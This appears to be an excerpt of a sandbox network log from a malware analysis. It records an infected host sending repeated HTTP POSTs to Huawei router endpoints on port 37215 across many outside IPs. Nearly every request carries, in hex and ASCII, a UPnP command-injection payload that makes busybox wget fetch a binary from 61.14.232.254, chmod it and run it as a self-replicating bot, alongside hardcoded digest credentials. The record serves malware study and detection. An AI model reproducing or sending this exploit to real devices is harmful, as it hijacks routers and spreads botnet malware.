73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1834192.168.2.1343392157.93.59.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640430927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1835192.168.2.1355238120.99.38.4437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640461922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1836192.168.2.135645641.151.4.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640500069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1837192.168.2.134692641.217.194.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640538931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1838192.168.2.135713080.146.198.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640575886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1839192.168.2.1348332157.38.206.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640631914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1840192.168.2.134343641.6.85.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640695095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1841192.168.2.133421876.108.206.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640717983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1842192.168.2.135395419.11.157.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640752077 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1843192.168.2.1353996197.43.37.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640779018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1844192.168.2.1350002201.25.160.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640782118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
